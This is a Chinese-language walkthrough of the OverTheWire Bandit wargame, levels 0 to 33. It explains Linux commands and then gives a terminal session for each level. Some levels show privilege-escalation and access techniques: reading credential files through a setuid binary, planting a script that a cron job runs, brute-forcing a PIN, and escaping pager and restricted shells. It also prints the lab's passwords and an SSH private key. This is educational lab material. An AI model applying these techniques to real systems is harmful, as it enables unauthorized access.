overthewire bandit闯关挑战level1~33

一、涉及的相关命令学习

1.echo 命令用于在终端设备上输出字符串或变量提取后的值，语法格式为“echo [字符串]

[$变量]

这是 Linux 系统中最常用的几个命令之一，它的操作却非常简单，执行“echo 字符串”

或“echo $变量”就行，其中$符号的意思是提取变量的实际值，以便后续的输出操作。

2. find 命令用于按照指定条件来查找文件所对应的位置，语法格式为“find [查找范围] 寻

找条件”。

3. head 命令用于查看纯文本文件的前 N 行，语法格式为“head [参数] 文件名称”。

4. tr 命令用于替换文本内容中的字符，英文全称为“translate”，语法格式为“tr [原始字符]

[目标字符]”。

5. wc 命令用于统计指定文本文件的行数、字数或字节数，英文全称为“word counts”，语

法格式为“wc [参数] 文件名

6．grep 命令用于按行提取文本内容，语法格式为“grep [参数] 文件名称”。

7. diff 命令用于比较多个文件之间内容的差异，英文全称为“different”，语法格式为“diff [参

数] 文件名称 A 文件名称 B”。

8. uniq 命令用于去除文本中连续的重复行，英文全称为“unique”，语法格式为“uniq [参数] 文

件名称”。

9. sort 命令用于对文本内容进行再排序，语法格式为“sort [参数] 文件名称”。

10. touch 命令用于创建空白文件或设置文件的时间，语法格式为“touch [参数] 文件名称”。

11. mkdir 命令用于创建空白的目录，英文全称为“make directory”，语法格式为“mkdir [参

数] 目录名称”

12. cp 命令用于复制文件或目录，英文全称为“copy”，语法格式为“cp [参数] 源文件名称 目

标文件名称”。

13. mv 命令用于剪切或重命名文件，英文全称为“move”，语法格式为“mv [参数] 源文件

名称 目标文件名称”。

14. rm 命令用于删除文件或目录，英文全称为“remove”，语法格式为“rm [参数] 文件

名称”。

15. file 命令用于查看文件的类型，语法格式为“file 文件名称”。

16. tar 命令用于对文件进行打包压缩或解压，语法格式为“tar 参数 文件名称”。

17.管道符 " | "

18.shell脚本

19. $?变量，作用是显示上一次命令的执行返回值，通常与echo $?使用

20. ">"和“>>”的区别

首先是“>”，是为替换：紧接着是“>>”，是为追加

21.xxd命令：生成二进制格式的输出（常用）xxd -b file.bin将十六进制表示转换回二进制文件
xxd -r file.hex file.bin

二、闯关练习

level0→level1

使用ssh登录，学习使用ssh命令

ssh bandit0@bandit.labs.overthewire.org -p 2220

输入密码bandit0，回车进入，再ls查阅文件发现readme，cat readme得到密码

bandit0@bandit:~$ ls
readme
bandit0@bandit:~$ cat readme
Congratulations on your first steps into the bandit game!!
Please make sure you have read the rules at https://overthewire.org/rules/
If you are following a course, workshop, walthrough or other educational activity,
please inform the instructor about the rules as well and encourage them to
contribute to the OverTheWire community so we can keep these games free!

The password you are looking for is: ZjLjTmM6FvvyRnrb2rfNWOZOTa6ip5If

level1→level2

使用ssh登录，后续登录基本都是类似操作

ssh bandit1@bandit.labs.overthewire.org -p 2220

由于文件名称的特殊性，必须用相对路径访问

bandit1@bandit:~$ ls
-
bandit1@bandit:~$ cat ./-
263JGJPfgU6LtdEvgfWU1XP5yac29mFx

level2→level3

文件名称有空格，用" "括起来

bandit2@bandit:~$ ls
spaces in this filename
bandit2@bandit:~$ cat "spaces in this filename"
MNk8KNH3Usiio41PRUEoDFPqfxLPlSmx

level3→level4

进入目录inhere，再ls -al查看所有隐藏文件

bandit3@bandit:~$ cd inhere
bandit3@bandit:~/inhere$ ll
total 12
drwxr-xr-x 2 root    root    4096 Jul 17 15:57 ./
drwxr-xr-x 3 root    root    4096 Jul 17 15:57 ../
-rw-r----- 1 bandit4 bandit3   33 Jul 17 15:57 ...Hiding-From-You
bandit3@bandit:~/inhere$ cat ...Hiding-From-You
2WmrDFRmJIq3IPxneAaMGhap0pFhF3NJ

level4→level5

进入目录inhere，ll查看所有，cat  ./*查看所有，或file ./*查看文件类型

bandit4@bandit:~/inhere$ cat ./*
N�.����9������F��p������tk���%�������n�Qy�y͍�{+R�bZ�k�F�*
l�����]�a߯-@gQ�÷�wz�P�ߠy��pӻT9�F��3ˤ����)
T�՜F�ǭ��QĹ�M���p4�-�8��=��!#g���4oQYVPkxZOOEOO5pTW81FB8j8lxXGUQw
�$}P�cL��s��@�2%Y��(|�^��J
                  ы�Ϣ��bandit4@bandit:~/inhere$ file ./*
./-file00: data
./-file01: data
./-file02: data
./-file03: data
./-file04: data
./-file05: data
./-file06: data
./-file07: ASCII text
./-file08: data
./-file09: data
bandit4@bandit:~/inhere$ cat ./-file07
4oQYVPkxZOOEOO5pTW81FB8j8lxXGUQw

level5→level6

利用find后加参数找到大小为1033字节的文件，再cat查看文件内容

bandit5@bandit:~/inhere$ find -type f -size 1033c
./maybehere07/.file2
bandit5@bandit:~/inhere$ cat ./maybehere07/.file2
HWasnPhtq9AVKe0dmk45nxy20cvUa6EG

也可以合并成一条命令

bandit5@bandit:~/inhere$ cat $(find -type f -size 1033c)
HWasnPhtq9AVKe0dmk45nxy20cvUa6EG

level6→level7

利用find命令按照题目要求find / -type f -user bandit7 -group bandit6 -size 33c找到符合要求的文件

bandit6@bandit:~$ find / -type f -user bandit7 -group bandit6 -size 33c

bandit6@bandit:~$ cat /var/lib/dpkg/info/bandit7.password
morbNTDkSW6jIlUc0ymOdMaLnOlFVAaj

level7→level8

grep命令查找文件中的单词

bandit7@bandit:~$ cat data.txt | grep millionth
millionth       dfwvzFQi4mU0wfNbFOe9RoWskMLg7eEc

level8→level9

uniq -u或--unique 仅显示出一次的行列。sort用来排序

bandit8@bandit:~$ ls
data.txt
bandit8@bandit:~$ sort ./data.txt | uniq -u
4CKMh1JI91bUIZZPXDqGanal4xvAg0JM

level9→level10

strings data.txt意思是打印文件中可打印的字符。

bandit9@bandit:~$ strings data.txt | grep ==
\a!;========== the
========== passwordf
========== isc
========== FGUW5ilLVJrxX9kMYMmlN4MgbpfMiqey

level10→level11

命令base64 -d data.txt      

base64用法-d, --decode # 解码    -i, --ignore-garbage # 解码时，忽略非字母字符

bandit10@bandit:~$ ls
data.txt
bandit10@bandit:~$ cat data.txt
VGhlIHBhc3N3b3JkIGlzIGR0UjE3M2ZaS2IwUlJzREZTR3NnMlJXbnBOVmozcVJyCg==
bandit10@bandit:~$ base64 -d data.txt
The password is dtR173fZKb0RRsDFSGsg2RWnpNVj3qRr

level11→level12

要求把每个字母替换成序号后面十三位的字母，如a换成n，z换成m，利用命令tr来替换

bandit11@bandit:~$ cat data.txt
Gur cnffjbeq vf 7k16JArUVv5LxVuJfsSVdbbtaHGlw9D4
bandit11@bandit:~$ cat data.txt | tr [a-zA-Z] [n-za-mN-ZA-M]
The password is 7x16WNeHIi5YkIhWsfFIqoognUTyj9Q4

level12→level13

gzip解压缩直接要更改后缀为.gz；bzip2解压缩时要更改文件后缀为bz2；tar解压缩时要更改后缀.tar，不断往复，直到得到data8.txt即为密码

bandit12@bandit:~$ mkdir /tmp/highway && cp data.txt /tmp/highway
bandit12@bandit:~$ cd /tmp/highway
bandit12@bandit:/tmp/highway$ cp data.txt /tmp/highway/mytest
andit12@bandit:/tmp/highway$ xxd -r data.txt > mytest
bandit12@bandit:/tmp/highway$ file mytest
mytest: gzip compressed data, was "data2.bin", last modified: Thu May  7 18:14:30 2020, max compression, from Unix
bandit12@bandit:/tmp/highway$ mv mytest mytest.gz
bandit12@bandit:/tmp/highway$ gzip -d mytest.gz
bandit12@bandit:/tmp/highway$ file mytest
mytest: bzip2 compressed data, block size = 900k
bandit12@bandit:/tmp/highway$ mv mytest mytest.bz2
bandit12@bandit:/tmp/highway$ bzip2 -d mytest.bz2 && file mytest
mytest: gzip compressed data, was "data4.bin", last modified: Thu May  7 18:14:30 2020, max compression, from Unix
bandit12@bandit:/tmp/highway$ mv mytest mytest.gz
bandit12@bandit:/tmp/highway$ gzip -d  mytest.gz && file mytest
mytest: POSIX tar archive (GNU)
bandit12@bandit:/tmp/highway$ mv mytest mytest.tar
bandit12@bandit:/tmp/highway$ tar xvf mytest.tar
data5.bin
bandit12@bandit:/tmp/highway$ file *
data5.bin:  POSIX tar archive (GNU)
data.txt:   ASCII text
mytest.tar: POSIX tar archive (GNU)
bandit12@bandit:/tmp/highway$ mv data5.bin data5.tar
bandit12@bandit:/tmp/highway$ tar xvf data5.tar
data6.bin
bandit12@bandit:/tmp/highway$ file data6.bin
data6.bin: bzip2 compressed data, block size = 900k

bandit12@bandit:/tmp/highway$ cat data8
The password is FO5dwFsc0cbaIiH0h8J2eUks2vdTDwAn

level13→level14

利用ssh -i 密钥 bandit14@localhost -p 2220登录bandit14，再 /etc/bandit_pass/bandit14看密码

bandit13@bandit:~$ ls
sshkey.private
bandit13@bandit:~$ ssh -i sshkey.private bandit14@localhost -p 2220
The authenticity of host '[localhost]:2220 ([127.0.0.1]:2220)' can't be established.
ED25519 key fingerprint is SHA256:C2ihUBV7ihnV1wUXRb4RrEcLfXC5CXlhmAAM/urerLY.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes

bandit14@bandit:~$ cat /etc/bandit_pass/bandit14
MU4VWeTyJk8ROof1qqmcBPaLh7lDCPvS

level14→level15

用nc命令直接把当前密码发送给30000端口即可

bandit14@bandit:~$ echo MU4VWeTyJk8ROof1qqmcBPaLh7lDCPvS | nc localhost 30000
Correct!
8xCjnmgoKbGLhHFAZlGE5Tmu4M2tKJQo

level15→level16

用openssl先连接到端口30001，再发送发送当前关卡的密码

bandit15@bandit:~$ echo 8xCjnmgoKbGLhHFAZlGE5Tmu4M2tKJQo | openssl s_client -connect localhost:30001 -ign_eof

read R BLOCK
Correct!
kSkvUpMQ7lBYyCM4GBPvCvT1BfWRy0Dx

closed

level16→level17

先利用nmap扫描主机31000-32000之间的端口，扫完端口之后尝试连接端口输入密码openssl s_client -connect localhost:31790 -ign_eof

bandit16@bandit:~$ nmap localhost -p 31000-32000
PORT      STATE SERVICE
31046/tcp open  unknown
31518/tcp open  unknown
31691/tcp open  unknown
31790/tcp open  unknown
31960/tcp open  unknown
bandit16@bandit:~$ echo kSkvUpMQ7lBYyCM4GBPvCvT1BfWRy0Dx | openssl s_client -connect localhost:31790 -ign_eof
read R BLOCK
Correct!
-----BEGIN RSA PRIVATE KEY-----
MIIEogIBAAKCAQEAvmOkuifmMg6HL2YPIOjon6iWfbp7c3jx34YkYWqUH57SUdyJ
imZzeyGC0gtZPGujUSxiJSWI/oTqexh+cAMTSMlOJf7+BrJObArnxd9Y7YT2bRPQ
Ja6Lzb558YW3FZl87ORiO+rW4LCDCNd2lUvLE/GL2GWyuKN0K5iCd5TbtJzEkQTu
DSt2mcNn4rhAL+JFr56o4T6z8WWAW18BR6yGrMq7Q/kALHYW3OekePQAzL0VUYbW
JGTi65CxbCnzc/w4+mqQyvmzpWtMAzJTzAzQxNbkR2MBGySxDLrjg0LWN6sK7wNX
x0YVztz/zbIkPjfkU1jHS+9EbVNj+D1XFOJuaQIDAQABAoIBABagpxpM1aoLWfvD
KHcj10nqcoBc4oE11aFYQwik7xfW+24pRNuDE6SFthOar69jp5RlLwD1NhPx3iBl
J9nOM8OJ0VToum43UOS8YxF8WwhXriYGnc1sskbwpXOUDc9uX4+UESzH22P29ovd
d8WErY0gPxun8pbJLmxkAtWNhpMvfe0050vk9TL5wqbu9AlbssgTcCXkMQnPw9nC
YNN6DDP2lbcBrvgT9YCNL6C+ZKufD52yOQ9qOkwFTEQpjtF4uNtJom+asvlpmS8A
vLY9r60wYSvmZhNqBUrj7lyCtXMIu1kkd4w7F77k+DjHoAXyxcUp1DGL51sOmama
+TOWWgECgYEA8JtPxP0GRJ+IQkX262jM3dEIkza8ky5moIwUqYdsx0NxHgRRhORT
8c8hAuRBb2G82so8vUHk/fur85OEfc9TncnCY2crpoqsghifKLxrLgtT+qDpfZnx
SatLdt8GfQ85yA7hnWWJ2MxF3NaeSDm75Lsm+tBbAiyc9P2jGRNtMSkCgYEAypHd
HCctNi/FwjulhttFx/rHYKhLidZDFYeiE/v45bN4yFm8x7R/b0iE7KaszX+Exdvt
SghaTdcG0Knyw1bpJVyusavPzpaJMjdJ6tcFhVAbAjm7enCIvGCSx+X3l5SiWg0A
R57hJglezIiVjv3aGwHwvlZvtszK6zV6oXFAu0ECgYAbjo46T4hyP5tJi93V5HDi
Ttiek7xRVxUl+iU7rWkGAXFpMLFteQEsRr7PJ/lemmEY5eTDAFMLy9FL2m9oQWCg
R8VdwSk8r9FGLS+9aKcV5PI/WEKlwgXinB3OhYimtiG2Cg5JCqIZFHxD6MjEGOiu
L8ktHMPvodBwNsSBULpG0QKBgBAplTfC1HOnWiMGOU3KPwYWt0O6CdTkmJOmL8Ni
blh9elyZ9FsGxsgtRBXRsqXuz7wtsQAgLHxbdLq/ZJQ7YfzOKU4ZxEnabvXnvWkU
YOdjHdSOoKvDQNWu6ucyLRAWFuISeXw9a/9p7ftpxm0TSgyvmfLF2MIAEwyzRqaM
77pBAoGAMmjmIJdjp+Ez8duyn3ieo36yrttF5NSsJLAbxFpdlc1gvtGCWW+9Cq0b
dxviW8+TFVEBl1O4f7HVm6EpTscdDxU+bCXWkfjuRb7Dy9GOtt9JPsX8MBTakzh3
vBgsyi/sN3RqRBcGU40fOoZyfAMT8s1m/uYv52O6IgeuZ/ujbjY=
-----END RSA PRIVATE KEY-----

到/tmp里面新建文件，复制上面内容到新建文件sshkey.private中，注意用chomd修改权限只有文件所有者可读写即可，利用ssh -i 密码登录

bandit16@bandit:/tmp$ touch sshkey.private
bandit16@bandit:/tmp$ vi sshkey.private
bandit16@bandit:/tmp$ ls -l sshkey.private
-rw-rw-r-- 1 bandit16 bandit16 1675 Jul 25 03:43 sshkey.private
bandit16@bandit:/tmp$ chmod 700 sshkey.private
bandit16@bandit:/tmp$ ls -l sshkey.private
-rwx------ 1 bandit16 bandit16 1675 Jul 25 03:43 sshkey.private
bandit16@bandit:/tmp$ ssh -i sshkey.private bandit17@localhost -p 2220

bandit17@bandit:~$ cat /etc/bandit_pass/bandit17
EReVavePLFHtFlFsjn3hyzMlvSuSAcRD

level17→level18

了解diff命令，找到两个文件的不同之处，上面一个就是新的下一关密码

bandit17@bandit:~$ ls
passwords.new  passwords.old
bandit17@bandit:~$ diff -d passwords.new passwords.old
42c42
< x2gLTTjFwMOhQ8oWNbMN362QKxfRqGlO
---
> bSrACvJvvBSxEM2SGsV5sn09vc3xgqyp

level18→level19

直接密码登录发现行不通，直接用可以用带命令的ssh来查看文件，输入上一关密码得到答案

ssh bandit18@bandit.labs.overthewire.org -p 2220 "cat readme" 

bandit18@bandit.labs.overthewire.org's password:
cGWpMaKXVwDUNgPAVJbWYuGHVn9zl3j8

level19→level20

文件有suid权限，也就是可以运行与创建者相同权限来运行程序，用它来读取Level 20的文件

bandit19@bandit:~$ ls -al
total 36
drwxr-xr-x  2 root     root      4096 Jul 17 15:57 .
drwxr-xr-x 70 root     root      4096 Jul 17 15:58 ..
-rwsr-x---  1 bandit20 bandit19 14880 Jul 17 15:57 bandit20-do
-rw-r--r--  1 root     root       220 Mar 31 08:41 .bash_logout
-rw-r--r--  1 root     root      3771 Mar 31 08:41 .bashrc
-rw-r--r--  1 root     root       807 Mar 31 08:41 .profile
bandit19@bandit:~$ ./bandit20-do cat /etc/bandit_pass/bandit20
0qXahG8ZjOVMN9Ghs7iOWsCfZyXOUbYO

level20→level21

命令echo "0qXahG8ZjOVMN9Ghs7iOWsCfZyXOUbYO"|nc -l -p 31111 &个选项是监听连接而不是去连接一个远程主机它用来在本地的31111端口接收到任何连接时,输出"GbKksEFF4yrVs6il55v6gwY5aVje5f0j"这行文本

bandit20@bandit:~$ echo "0qXahG8ZjOVMN9Ghs7iOWsCfZyXOUbYO"|nc -l -p 31111 &
[1] 3835198
bandit20@bandit:~$ ./suconnect 31111
Read: 0qXahG8ZjOVMN9Ghs7iOWsCfZyXOUbYO
Password matches, sending next password
EeoULMCra2q0dSkYj561DX7s1CpBuOBt
[1]+  Done                    echo "0qXahG8ZjOVMN9Ghs7iOWsCfZyXOUbYO" | nc -l -p 31111
bandit20@bandit:~$

level21→level22

先去到/etc/cron.d查看执行的任务，再读取脚本，发现把密码写入了/tmp中的一个文件中，再cat获取文件内容

cat /usr/bin/cronjob_bandit22.sh
#!/bin/bash
chmod 644 /tmp/t7O6lds9S0RqQh9aMcz6ShpAoZKF7fgv
cat /etc/bandit_pass/bandit22 > /tmp/t7O6lds9S0RqQh9aMcz6ShpAoZKF7fgv

bandit21@bandit:/usr/bin$ cat /tmp/t7O6lds9S0RqQh9aMcz6ShpAoZKF7fgv
tRae0UfB9v0UzbCdn9cY0gQnds9GF58Q

level22→level23

一样的读取bandit23的脚本，注意把whoami这个变量用bandit23直接代替掉就行

bandit22@bandit:/etc/cron.d$ cat /usr/bin/cronjob_bandit23.sh
#!/bin/bash

myname=$(whoami)
mytarget=$(echo I am user $myname | md5sum | cut -d ' ' -f 1)

echo "Copying passwordfile /etc/bandit_pass/$myname to /tmp/$mytarget"

cat /etc/bandit_pass/$myname > /tmp/$mytarget

bandit22@bandit:/etc/cron.d$ echo "Copying passwordfile /etc/bandit_pass/bandit23 to /tmp/$mytarget"
Copying passwordfile /etc/bandit_pass/bandit23 to /tmp/8ca319486bfbbc3663ea0fbe81326349
bandit22@bandit:/etc/cron.d$ cat /tmp/8ca319486bfbbc3663ea0fbe81326349
0Zf11ioIjMVN551jX3CmStKLYqjk54Ga

level23→level24

读取bandit24的脚本

bandit23@bandit:/etc/cron.d$ cat /usr/bin/cronjob_bandit24.sh
#!/bin/bash

myname=$(whoami)

cd /var/spool/$myname/foo
echo "Executing and deleting all scripts in /var/spool/$myname/foo:"
for i in * .*;
do
    if [ "$i" != "." -a "$i" != ".." ];
    then
        echo "Handling $i"
        owner="$(stat --format "%U" ./$i)"
        if [ "${owner}" = "bandit23" ]; then
            timeout -s 9 60 ./$i
        fi
        rm -f ./$i
    fi
done

查看文件属性

bandit23@bandit:/tmp$ ls -al /var/spool
total 20
drwxr-xr-x  5 root root     4096 May 14  2020 .
drwxr-xr-x 11 root root     4096 May  7  2020 ..
drwxrwx-wx 62 root bandit24 4096 Jan 19 12:46 bandit24
drwxr-xr-x  3 root root     4096 May  3  2020 cron
lrwxrwxrwx  1 root root        7 May  3  2020 mail -> ../mail
drwx------  2 root root     4096 Jan 14  2018 rsyslog

写一个脚本，把脚本拷贝到这个文件夹

bandit23@bandit:/tmp$ vim ./get_pass.sh
 
#!/bin/bash
 
cat /etc/bandit_pass/bandit24 > /tmp/bandit24pass

拷贝到/var/spool/bandit24/foo里面，cp ./get_pass.sh /var/spool/bandit24/然后我们就等待执行，执行结束之后，获得密码gb8KRRCsshuZXI0tUuR6ypOFjiZbf3G8

level24→level25

编写脚本爆破四位数密码，放在前一关的密码一起输出到端口30002中去

bandit24@bandit:/tmp$ vi boom.ssh

#!bin/bash
for i in {0..9}{0..9}{0..9}{0..9}
do
    echo "gb8KRRCsshuZXI0tUuR6ypOFjiZbf3G8"" "$i>>bandit25
done
cat ./bandit25 | nc localhost 30002 >>bandit25pass
tail -5 bandit25pass

bandit24@bandit:/tmp$ bash boom.sh
Wrong! Please enter the correct current password and pincode. Try again.
Wrong! Please enter the correct current password and pincode. Try again.
Correct!
The password of user bandit25 is iCi86ttT4KSNe1armKiwbQNmB3YJP3q4

level25→level26

先用ssh -i 连接到bandit26，显示connection closed，所以查看一下/etc/passwd，找一下bandit26的shell。发现有一个more

bandit25@bandit:~$ cat /etc/passwd|grep bandit26
bandit26:x:11026:11026:bandit level 26:/home/bandit26:/usr/bin/showtext
bandit25@bandit:~$ cat /usr/bin/showtext
#!/bin/sh
 
export TERM=linux
 
more ~/text.txt
exit 0

把终端界面拉到最小。再重新连接一下

bandit25@bandit:~$ ssh bandit26@localhost -i bandit26.sshkey

看到more之后，按下v进入编辑模式输入:r /etc/bandit_pass/bandit26，按下两次enter得到密码       s0773xxkk0MXfdqOfPRVr9L3jJBUOgCZ

level26→level27

直接用密码登录26会出现跟25一样的情况，bash直接被退出，同样继续利用more的特性，我们缩小终端窗口，然后按v进入vi模式，需要输入:set shell=/usr/bin

:set shell sh=/bin/sh
:sh
[No write since last change]
$ ls
bandit27-do  text.txt
$ ls -al
total 36
drwxr-xr-x  3 root     root     4096 May  7  2020 .
drwxr-xr-x 41 root     root     4096 May  7  2020 ..
-rwsr-x---  1 bandit27 bandit26 7296 May  7  2020 bandit27-do
-rw-r--r--  1 root     root      220 May 15  2017 .bash_logout
-rw-r--r--  1 root     root     3526 May 15  2017 .bashrc
-rw-r--r--  1 root     root      675 May 15  2017 .profile
drwxr-xr-x  2 root     root     4096 May  7  2020 .ssh
-rw-r-----  1 bandit26 bandit26  258 May  7  2020 text.txt
$ ./bandit27-do cat /etc/bandit_pass/bandit27
upsNCc7vzaRDx6oZC6GiR6ERwe1MowGB

level27→level28

进入/tmp/bandit27/，再然后git clone ssh://bandit27-git@localhost:2220/home/bandit27-git/repo，克隆完毕后，进入repo读取readme

bandit27@bandit:~$ mkdir /tmp/highway27 && cd /tmp/highway27
bandit27@bandit:/tmp/highway27$ git clone ssh://bandit27-git@localhost/home/bandit27-git/repo
Cloning into 'repo'...
remote: Counting objects: 3, done.
remote: Compressing objects: 100% (2/2), done.
remote: Total 3 (delta 0), reused 0 (delta 0)
Receiving objects: 100% (3/3), done.

bandit27@bandit:/tmp/highway27$ ls -l
total 4
drwxr-sr-x 3 bandit27 root 4096 Jun 24 02:47 repo
bandit27@bandit:/tmp/highway27$ ls -l /tmp/highway27/repo
total 4
-rw-r--r-- 1 bandit27 root 68 Jun 24 02:47 README
bandit27@bandit:/tmp/highway27$ cat /tmp/highway27/repo/README
The password to the next level is: Yz9IpL0sBcCeuG7m9uQFt8ZNpS4HZRcN

level28→level29

先克隆

bandit28@bandit:~$ mkdir /tmp/highway28 && cd /tmp/highway28
bandit28@bandit:/tmp/highway28$ git clone ssh://bandit28-git@localhost/home/bandit28-git/repo

再查看克隆内容

bandit28@bandit:/tmp/highway28$ ls -l /tmp/highway28/repo
total 4
-rw-r--r-- 1 bandit28 root 111 Jun 24 03:03 README.md
bandit28@bandit:/tmp/highway28$ cat /tmp/highway28/repo/README.md
# Bandit Notes
Some notes for level29 of bandit.

## credentials

- username: bandit29
- password: xxxxxxxxxx

发现没有密码，用git show查看日志，得到密码4pT1t5DENaYuqnqvadYs1oE4QLCdjmJ7

level29→level30

同样，把repo克隆到本地，查看README.md的提示

bandit29@bandit:/tmp/highway29$ cd repo && cat README.md
# Bandit Notes
Some notes for bandit30 of bandit.

## credentials

- username: bandit30
- password: <no passwords in production!>

使用 git branch -a 查看分支，git checkout dev切换分支，在分支下找到密码
 

bandit29@bandit:/tmp/highway29/repo$ git checkout dev
Branch dev set up to track remote branch dev from origin.
Switched to a new branch 'dev'
bandit29@bandit:/tmp/highway29/repo$ cat README.md
# Bandit Notes
Some notes for bandit30 of bandit.

## credentials

- username: bandit30
- password: qp30ex3VLz5MDG1n91YowTv4Q8l7CDZL

level30→level31

bandit30@bandit:/tmp/highway30/repo$ cat README.md
just an epmty file... muahaha

克隆完毕后，进入repo读取readme发现无密码，git show-ref可以现实本地存储库的所有可用的引用以及关联的提交ID，找到git show secret得到密码

bandit30@bandit:/tmp/highway30/repo$ git show secret
47e603bb428404d265f59c42920d81e5

level31→level32

创建key.txt然后把key.txt提交到stage区域,git add key.txt然后;gitcommit -m "key"最后git push

#生成文件key.txt
bandit31@bandit:/tmp/bandit31/repo$ echo 'May I come in?' >> key.txt
#加到本地文件
bandit31@bandit:/tmp/bandit31/repo$ git add -f ./key.txt
#查看一下是否是master
bandit31@bandit:/tmp/bandit31/repo$ git status
On branch master
Your branch is up-to-date with 'origin/master'.
Changes to be committed:
  (use "git reset HEAD <file>..." to unstage)
 
	new file:   key.txt
 
#commit到本地仓库
bandit31@bandit:/tmp/bandit31/repo$ git commit -m 'key.txt'
[master 088ccca] key.txt
 1 file changed, 1 insertion(+)
 create mode 100644 key.txt
#push到远程origin master
bandit31@bandit:/tmp/bandit31/repo$ git push origin master
Could not create directory '/home/bandit31/.ssh'.
The authenticity of host 'localhost (127.0.0.1)' can't be established.
ECDSA key fingerprint is SHA256:98UL0ZWr85496EtCRkKlo20X3OPnyPSB5tB5RPbhczc.
Are you sure you want to continue connecting (yes/no)? yes
Failed to add the host to the list of known hosts (/home/bandit31/.ssh/known_hosts).
This is a OverTheWire game server. More information on http://www.overthewire.org/wargames
bandit31-git@localhost's password:
Counting objects: 3, done.
Delta compression using up to 2 threads.
Compressing objects: 100% (2/2), done.
Writing objects: 100% (3/3), 319 bytes | 0 bytes/s, done.
Total 3 (delta 0), reused 0 (delta 0)
remote: ### Attempting to validate files... ####
remote:
remote: .oOo.oOo.oOo.oOo.oOo.oOo.oOo.oOo.oOo.oOo.
remote:
remote: Well done! Here is the password for the next level:
remote: 3O9RfhqyAlVBEZpVb6LYStshZoqoSx5K
remote:
remote: .oOo.oOo.oOo.oOo.oOo.oOo.oOo.oOo.oOo.oOo.
remote:
To ssh://localhost/home/bandit31-git/repo
 ! [remote rejected] master -> master (pre-receive hook declined)
error: failed to push some refs to 'ssh://bandit31-git@localhost/home/bandit31-git/repo'

level32→level33

这一关需要使用$0，然后再cat /etc/bandit_pass/bandit33

WELCOME TO THE UPPERCASE SHELL
>> $0
$ cat /etc/bandit_pass/bandit33
tQdtbs5D5i2vJwkO8mEyYEyTL8izoeJ0